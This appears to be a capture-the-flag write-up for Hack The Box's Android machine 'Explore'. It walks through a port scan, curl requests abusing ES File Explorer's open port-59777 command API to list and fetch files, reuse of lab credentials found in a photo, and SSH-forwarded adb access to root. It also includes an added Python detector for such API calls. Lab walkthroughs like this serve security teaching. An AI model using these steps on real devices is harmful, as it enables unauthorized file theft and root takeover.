Basic information

Port scan

This should be HTB's first Android box; a full port scan is needed:

$ nmap -p- 10.10.10.247
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-28 08:59 CST
Nmap scan report for 10.10.10.247
Host is up (0.073s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE
2222/tcp open EtherNetIP-1
5555/tcp filtered freeciv
38991/tcp open unknown
42135/tcp open unknown
59777/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 985.66 seconds

59777

Accessing it directly only shows that directory listing is forbidden:

ES File Explorer

Searching for "android 59777" shows that this is ES File Explorer:

curl --header "Content-Type: application/json" --request POST --data '{"command":"[my_awesome_cmd]"}' http://192.168.0.8:59777

curl --header "Content-Type: application/json" --request POST --data '{"command":"getDeviceInfo"}' http://10.10.10.247:59777
curl --header "Content-Type: application/json" --request POST --data '{"command":"listFiles"}' http://10.10.10.247:59777/sdcard
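From the defender's side, the same JSON command API is easy to spot in traffic: a POST to port 59777 whose body carries a `command` field. The following detector is an added example, not part of the original writeup; the log line format, the `10.10.14.5` client address and the sample entries are constructed assumptions.

```python
import json
import re

# Constructed log line format (an assumption, not any real tool's output):
#   "<src_ip> -> <dst_ip>:<dst_port> <METHOD> <path> body=<json>"
LOG_RE = re.compile(r"^(?P<src>\S+) -> (?P<dst>\S+):(?P<port>\d+) (?P<method>[A-Z]+) "
                    r"(?P<path>\S+)(?: body=(?P<body>.*))?$")
ES_FILE_EXPLORER_PORT = 59777  # HTTP command port seen in the scan above


def parse_line(line):
    """Parse one log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["port"] = int(rec["port"])
    return rec


def es_command(rec):
    """Return the ES File Explorer command name if this looks like a call to its
    JSON API (POST to 59777 with a JSON body carrying "command"), else None."""
    if rec["port"] != ES_FILE_EXPLORER_PORT or rec["method"] != "POST" or not rec["body"]:
        return None
    try:
        body = json.loads(rec["body"])
    except ValueError:
        return None
    cmd = body.get("command") if isinstance(body, dict) else None
    return cmd if isinstance(cmd, str) else None


def scan_log(lines):
    """Return (src, dst, command, path) for every ES File Explorer API call found."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        cmd = es_command(rec)
        if cmd:
            findings.append((rec["src"], rec["dst"], cmd, rec["path"]))
    return findings


# Constructed sample: the two API calls from the writeup, a plain GET, and a POST elsewhere.
SAMPLE_LOG = [
    '10.10.14.5 -> 10.10.10.247:59777 POST / body={"command":"getDeviceInfo"}',
    '10.10.14.5 -> 10.10.10.247:59777 POST /sdcard body={"command":"listFiles"}',
    '10.10.14.5 -> 10.10.10.247:59777 GET /sdcard/DCIM/creds.jpg',
    '10.10.14.5 -> 10.10.10.247:8080 POST /api body={"command":"listFiles"}',
]
```

Only the two POSTs to 59777 with a JSON `command` are reported; the plain file fetch and the POST to another port are ignored.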

user flag

user.txt is found in the sdcard directory and can be fetched directly:

Creds information

There is a creds.jpg in DCIM:

kristi
Kr1sT!5h@Rp3xPl0r3!

This username and password allow SSH login:

adb & root flag

The port scan showed 5555 as filtered; after forwarding that port over SSH, adb can connect, and su works directly:

ssh -L 5555:127.0.0.1:5555 kristi@10.10.10.247 -p 2222

adb connect localhost:5555
adb shell
su

root flag

References